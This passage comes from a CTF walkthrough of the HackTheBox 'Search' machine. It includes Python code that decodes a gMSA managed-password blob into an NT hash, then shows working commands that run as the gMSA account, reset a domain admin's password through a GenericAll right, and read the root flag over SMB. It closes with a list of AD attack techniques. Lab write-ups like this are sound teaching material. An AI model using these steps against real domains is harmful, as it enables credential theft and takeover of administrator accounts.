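What `ConvertFrom-ADManagedPasswordBlob` (and gMSADumper) actually decode is the MSDS-MANAGEDPASSWORD_BLOB structure behind the `msDS-ManagedPassword` attribute listed above: a small header, the current and optional previous password as NUL-terminated UTF-16LE strings, and two 64-bit intervals in 100 ns units. The following is an added example, not the walkthrough’s code and not gMSADumper, that builds a constructed blob and parses it back, including the NT hash (MD4 of the UTF-16LE password) that gMSADumper prints; MD4 is implemented inline because `hashlib`’s `md4` is disabled on many current OpenSSL builds. Anyone who can read this attribute gets the hash directly, which is why membership of `msDS-GroupMSAMembership` deserves the same scrutiny as the password itself.

```python
"""Decode an msDS-ManagedPassword value (MSDS-MANAGEDPASSWORD_BLOB, MS-ADTS 2.2.19).
Added example, not the walkthrough's code and not gMSADumper.  The blob is constructed
by build_blob(); MD4 is inlined because hashlib's 'md4' is disabled on many OpenSSL
builds.  Intervals are 64-bit counts of 100 ns units, as in the protocol.
"""
import struct

HUNDRED_NS_PER_DAY = 86_400 * 10_000_000
M = 0xFFFFFFFF


def md4(data: bytes) -> bytes:
    """Minimal MD4 (RFC 1320). NT hash = MD4(UTF-16LE(password))."""
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rol = lambda x, n: (((x & M) << n) | ((x & M) >> (32 - n))) & M
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for i in range(16):                                   # round 1
            a, b, c, d = d, rol(a + F(b, c, d) + X[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                   # round 2
            k = (i % 4) * 4 + i // 4
            a, b, c, d = d, rol(a + G(b, c, d) + X[k] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                   # round 3
            k = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)[i]
            a, b, c, d = d, rol(a + H(b, c, d) + X[k] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a, b, c, d = (a + aa) & M, (b + bb) & M, (c + cc) & M, (d + dd) & M
    return struct.pack("<4I", a, b, c, d)


def build_blob(current: str, previous: str = "", query_days: int = 30, unchanged_days: int = 0) -> bytes:
    """Constructed blob: 16-byte header, NUL-terminated UTF-16LE passwords, 8-byte
    alignment padding, then QueryPasswordInterval and UnchangedPasswordInterval."""
    cur = current.encode("utf-16-le") + b"\x00\x00"
    prev = previous.encode("utf-16-le") + b"\x00\x00" if previous else b""
    cur_off = 16
    prev_off = cur_off + len(cur) if previous else 0
    body_end = cur_off + len(cur) + len(prev)
    pad = (-body_end) % 8
    q_off, u_off = body_end + pad, body_end + pad + 8
    hdr = struct.pack("<HHIHHHH", 1, 0, u_off + 8, cur_off, prev_off, q_off, u_off)
    intervals = struct.pack("<QQ", query_days * HUNDRED_NS_PER_DAY, unchanged_days * HUNDRED_NS_PER_DAY)
    return hdr + cur + prev + b"\x00" * pad + intervals


def parse_blob(blob: bytes) -> dict:
    """Return the passwords, the NT hash (what gMSADumper prints) and the intervals in days."""
    version, _, length, cur_off, prev_off, q_off, u_off = struct.unpack_from("<HHIHHHH", blob)
    if version != 1 or length != len(blob):
        raise ValueError("not a version-1 MSDS-MANAGEDPASSWORD_BLOB")

    def utf16z(off):                       # NUL-terminated UTF-16LE string at `off`
        end = off
        while blob[end:end + 2] != b"\x00\x00":
            end += 2
            if end >= len(blob):
                raise ValueError("unterminated password string")
        return blob[off:end].decode("utf-16-le")

    current = utf16z(cur_off)
    return {
        "current": current,
        "previous": utf16z(prev_off) if prev_off else None,
        "nt_hash": md4(current.encode("utf-16-le")).hex(),   # readers of the blob get this directly
        "query_interval_days": struct.unpack_from("<Q", blob, q_off)[0] / HUNDRED_NS_PER_DAY,
        "unchanged_interval_days": struct.unpack_from("<Q", blob, u_off)[0] / HUNDRED_NS_PER_DAY,
    }


if __name__ == "__main__":
    # Constructed sample; a real gMSA password is 120 random UTF-16 characters.
    print(parse_blob(build_blob("password", query_days=30)))
```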

Everything is set; now we can invoke commands to run any kind of script or command.

Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

We use the command above to check which user we are running as right now.

As you can see, the ‘whoami’ result shows that we are the ‘BIR-ADFS-GMSA$’ user, not ‘Sierra’. Let’s look into BloodHound one more time.

Let’s look at the BloodHound help text for ‘GenericAll’.

As you can see, ‘GenericAll’ means full control over the ‘Tristan’ user, who is also a domain admin. Let’s change the domain admin’s password.

PS C:\Users\Sierra.Frye\Documents> Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {net user Tristan.Davies qwerty1234 /domain}
The command completed successfully.

Now we can access the Administrator directory to read the root flag.

┌──(root💀kali)-[~/hackthebox/machine/search]
└─# smbclient //search.htb/C$ -U Tristan.Davies
Enter WORKGROUP\Tristan.Davies's password:
Try "help" to get a list of possible commands.
smb: \> cd \Users\Administrator\Desktop
smb: \Users\Administrator\Desktop\> ls
. DRc 0 Mon Nov 22 15:21:49 2021
.. DRc 0 Mon Nov 22 15:21:49 2021
desktop.ini AHS 282 Mon Nov 22 15:21:49 2021
root.txt ARc 34 Fri Jan 7 11:13:49 2022

3246079 blocks of size 4096. 461189 blocks available
smb: \Users\Administrator\Desktop\> get root.txt
getting file \Users\Administrator\Desktop\root.txt of size 34 as root.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)


┌──(root💀kali)-[~/hackthebox/machine/search]
└─# cat root.txt
e66ca102d9ee6b0894fffa9a65b13e18

Summary of techniques

  • kerbrute: enumerate valid usernames
  • crackmapexec: password spraying
  • bloodhound: information gathering
  • Kerberoasting without SPNs
  • hashcat: crack the service account’s hash
  • XLSX file: remove password protection
  • browser digital certificate: crack the password using p12tool
  • gMSADumper: read the gMSA password
  • change the domain admin’s password to privesc

Contact me

  • QQ: 1185151867
  • twitter: https://twitter.com/fdlucifer11
  • github: https://github.com/FDlucifer

I’m lUc1f3r11, a ctfer, reverse engineer, ioter, red teamer, coder, gopher, pythoner, AI lover, security researcher, hacker, bug hunter and more…